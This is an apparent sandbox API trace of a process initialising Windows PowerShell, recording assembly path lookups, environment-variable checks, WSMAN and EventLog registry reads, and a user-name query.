	[0287.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0287.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0287.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0287.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0287.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0287.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0288.621] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0288.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.621] CoTaskMemFree (pv=0x1b8428b0) 
	[0288.622] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0288.622] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.622] CoTaskMemFree (pv=0x1b8428b0) 
	[0288.622] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0288.622] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.622] CoTaskMemFree (pv=0x1b8428b0) 
	[0288.623] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0288.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.623] CoTaskMemFree (pv=0x1b8428b0) 
	[0288.626] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0288.626] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.626] CoTaskMemFree (pv=0x1b8428b0) 
	[0288.627] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0288.627] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.627] CoTaskMemFree (pv=0x1b8428b0) 
	[0288.627] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0288.627] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.627] CoTaskMemFree (pv=0x1b8428b0) 
	[0288.631] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd638 | out: phkResult=0xcd638*=0x304) returned 0x0
	[0288.633] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd53c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd538, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd53c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd538*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0288.633] CoTaskMemFree (pv=0x0) 
	[0288.634] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0288.634] RegEnumValueW (in: hKey=0x304, dwIndex=0x0, lpValueName=0x1766d0, lpcchValueName=0xcd5e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcd5e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0288.634] CoTaskMemFree (pv=0x1766d0) 
	[0288.634] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0288.634] RegEnumValueW (in: hKey=0x304, dwIndex=0x1, lpValueName=0x1766d0, lpcchValueName=0xcd5e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcd5e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0288.634] CoTaskMemFree (pv=0x1766d0) 
	[0288.634] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0288.634] RegEnumValueW (in: hKey=0x304, dwIndex=0x2, lpValueName=0x1766d0, lpcchValueName=0xcd5e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcd5e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0288.634] CoTaskMemFree (pv=0x1766d0) 
	[0288.635] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd5cc, lpData=0x0, lpcbData=0xcd5c8*=0x0 | out: lpType=0xcd5cc*=0x1, lpData=0x0, lpcbData=0xcd5c8*=0x8) returned 0x0
	[0288.635] CoTaskMemAlloc (cb=0xc) returned 0x1b83d7d0
	[0288.635] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd59c, lpData=0x1b83d7d0, lpcbData=0xcd598*=0x8 | out: lpType=0xcd59c*=0x1, lpData="2.0", lpcbData=0xcd598*=0x8) returned 0x0
	[0288.635] CoTaskMemFree (pv=0x1b83d7d0) 
	[0289.334] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd588 | out: phkResult=0xcd588*=0x308) returned 0x0
	[0289.334] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd48c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd488, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd48c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd488*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.334] CoTaskMemFree (pv=0x0) 
	[0289.334] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0289.334] RegEnumValueW (in: hKey=0x308, dwIndex=0x0, lpValueName=0x1766d0, lpcchValueName=0xcd538, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcd538, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0289.334] CoTaskMemFree (pv=0x1766d0) 
	[0289.334] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0289.334] RegEnumValueW (in: hKey=0x308, dwIndex=0x1, lpValueName=0x1766d0, lpcchValueName=0xcd538, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcd538, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0289.334] CoTaskMemFree (pv=0x1766d0) 
	[0289.334] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0289.334] RegEnumValueW (in: hKey=0x308, dwIndex=0x2, lpValueName=0x1766d0, lpcchValueName=0xcd538, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcd538, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0289.334] CoTaskMemFree (pv=0x1766d0) 
	[0289.334] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd51c, lpData=0x0, lpcbData=0xcd518*=0x0 | out: lpType=0xcd51c*=0x1, lpData=0x0, lpcbData=0xcd518*=0x8) returned 0x0
	[0289.334] CoTaskMemAlloc (cb=0xc) returned 0x1b83d5d0
	[0289.334] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd4ec, lpData=0x1b83d5d0, lpcbData=0xcd4e8*=0x8 | out: lpType=0xcd4ec*=0x1, lpData="2.0", lpcbData=0xcd4e8*=0x8) returned 0x0
	[0289.334] CoTaskMemFree (pv=0x1b83d5d0) 
	[0289.336] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0289.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0289.336] CoTaskMemFree (pv=0x1b8428b0) 
	[0289.341] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0289.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0289.341] CoTaskMemFree (pv=0x1b8428b0) 
	[0289.346] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5b8 | out: phkResult=0xcd5b8*=0x30c) returned 0x0
	[0289.348] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd52c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd528, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd52c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd528*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.348] CoTaskMemFree (pv=0x0) 
	[0289.349] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0289.349] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x0, lpName=0x1766d0, lpcchName=0xcd5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.349] CoTaskMemFree (pv=0x1766d0) 
	[0289.349] CoTaskMemFree (pv=0x0) 
	[0289.349] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0289.349] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x1, lpName=0x1766d0, lpcchName=0xcd5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.349] CoTaskMemFree (pv=0x1766d0) 
	[0289.349] CoTaskMemFree (pv=0x0) 
	[0289.349] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0289.349] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x2, lpName=0x1766d0, lpcchName=0xcd5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.349] CoTaskMemFree (pv=0x1766d0) 
	[0289.349] CoTaskMemFree (pv=0x0) 
	[0289.349] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0289.349] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x3, lpName=0x1766d0, lpcchName=0xcd5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.349] CoTaskMemFree (pv=0x1766d0) 
	[0289.350] CoTaskMemFree (pv=0x0) 
	[0289.350] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0289.350] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x4, lpName=0x1766d0, lpcchName=0xcd5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.350] CoTaskMemFree (pv=0x1766d0) 
	[0289.350] CoTaskMemFree (pv=0x0) 
	[0289.350] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0289.350] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x5, lpName=0x1766d0, lpcchName=0xcd5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.350] CoTaskMemFree (pv=0x1766d0) 
	[0289.350] CoTaskMemFree (pv=0x0) 
	[0289.350] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0289.350] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x6, lpName=0x1766d0, lpcchName=0xcd5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.350] CoTaskMemFree (pv=0x1766d0) 
	[0289.350] CoTaskMemFree (pv=0x0) 
	[0289.350] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0289.350] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x7, lpName=0x1766d0, lpcchName=0xcd5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.350] CoTaskMemFree (pv=0x1766d0) 
	[0289.350] CoTaskMemFree (pv=0x0) 
	[0289.350] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0289.350] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x8, lpName=0x1766d0, lpcchName=0xcd5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0289.350] CoTaskMemFree (pv=0x1766d0) 
	[0289.350] CoTaskMemFree (pv=0x0) 
	[0289.350] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd618 | out: phkResult=0xcd618*=0x320) returned 0x0
	[0289.350] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd618 | out: phkResult=0xcd618*=0x0) returned 0x2
	[0289.351] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd618 | out: phkResult=0xcd618*=0x1cc) returned 0x0
	[0289.351] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd618 | out: phkResult=0xcd618*=0x0) returned 0x2
	[0289.351] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd618 | out: phkResult=0xcd618*=0x330) returned 0x0
	[0289.351] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd618 | out: phkResult=0xcd618*=0x0) returned 0x2
	[0289.351] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd618 | out: phkResult=0xcd618*=0x334) returned 0x0
	[0289.351] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd618 | out: phkResult=0xcd618*=0x0) returned 0x2
	[0289.351] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd618 | out: phkResult=0xcd618*=0x338) returned 0x0
	[0289.351] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd618 | out: phkResult=0xcd618*=0x0) returned 0x2
	[0289.351] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd618 | out: phkResult=0xcd618*=0x33c) returned 0x0
	[0289.351] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd618 | out: phkResult=0xcd618*=0x0) returned 0x2
	[0289.351] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd618 | out: phkResult=0xcd618*=0x340) returned 0x0
	[0289.352] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd618 | out: phkResult=0xcd618*=0x0) returned 0x2
	[0289.352] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd618 | out: phkResult=0xcd618*=0x344) returned 0x0
	[0290.054] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd618 | out: phkResult=0xcd618*=0x0) returned 0x2
	[0290.054] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd618 | out: phkResult=0xcd618*=0x348) returned 0x0
	[0290.054] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd618 | out: phkResult=0xcd618*=0x34c) returned 0x0
	[0290.055] RegCloseKey (hKey=0x34c) returned 0x0
	[0290.055] RegCloseKey (hKey=0x30c) returned 0x0
	[0290.056] RegCloseKey (hKey=0x348) returned 0x0
	[0290.068] CoTaskMemAlloc (cb=0x804) returned 0x1b88ad90
	[0290.069] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b88ad90, nSize=0xcd828 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd828) returned 0x1
	[0290.070] CoTaskMemFree (pv=0x1b88ad90) 
	[0290.072] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0290.072] GetUserNameW (in: lpBuffer=0x1766d0, pcbBuffer=0xcd868 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd868) returned 1
	[0290.072] CoTaskMemFree (pv=0x1766d0) 
	[0290.089] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd568 | out: phkResult=0xcd568*=0x350) returned 0x0
	[0290.089] RegQueryInfoKeyW (in: hKey=0x350, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd4dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd4d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd4dc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd4d8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.089] CoTaskMemFree (pv=0x0) 
	[0290.089] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0290.089] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x0, lpName=0x1766d0, lpcchName=0xcd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.090] CoTaskMemFree (pv=0x1766d0) 
	[0290.090] CoTaskMemFree (pv=0x0) 
	[0290.090] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0290.090] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x1, lpName=0x1766d0, lpcchName=0xcd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.090] CoTaskMemFree (pv=0x1766d0) 
	[0290.090] CoTaskMemFree (pv=0x0) 
	[0290.090] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0290.090] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x2, lpName=0x1766d0, lpcchName=0xcd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.090] CoTaskMemFree (pv=0x1766d0) 
	[0290.090] CoTaskMemFree (pv=0x0) 
	[0290.090] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0290.090] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x3, lpName=0x1766d0, lpcchName=0xcd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.090] CoTaskMemFree (pv=0x1766d0) 
	[0290.090] CoTaskMemFree (pv=0x0) 
	[0290.090] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0290.090] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x4, lpName=0x1766d0, lpcchName=0xcd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.090] CoTaskMemFree (pv=0x1766d0) 
	[0290.091] CoTaskMemFree (pv=0x0) 
	[0290.091] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0290.091] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x5, lpName=0x1766d0, lpcchName=0xcd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.091] CoTaskMemFree (pv=0x1766d0) 
	[0290.091] CoTaskMemFree (pv=0x0) 
	[0290.091] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0290.091] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x6, lpName=0x1766d0, lpcchName=0xcd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.091] CoTaskMemFree (pv=0x1766d0) 
	[0290.091] CoTaskMemFree (pv=0x0) 
	[0290.091] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0290.091] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x7, lpName=0x1766d0, lpcchName=0xcd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.091] CoTaskMemFree (pv=0x1766d0) 
	[0290.091] CoTaskMemFree (pv=0x0) 
	[0290.091] CoTaskMemAlloc (cb=0x204) returned 0x1766d0
	[0290.091] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x8, lpName=0x1766d0, lpcchName=0xcd568, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd568, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.091] CoTaskMemFree (pv=0x1766d0) 
	[0290.091] CoTaskMemFree (pv=0x0) 
	[0290.091] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x354) returned 0x0
	[0290.092] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x0) returned 0x2
	[0290.092] RegOpenKeyExW (in: hKey=0x350, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x358) returned 0x0
	[0290.092] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x0) returned 0x2
	[0290.092] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x35c) returned 0x0
	[0290.092] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x0) returned 0x2
	[0290.092] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x360) returned 0x0
	[0290.092] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x0) returned 0x2
	[0290.092] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5c8 | out: phkResult=0xcd5c8*=0x364) returned 0x0
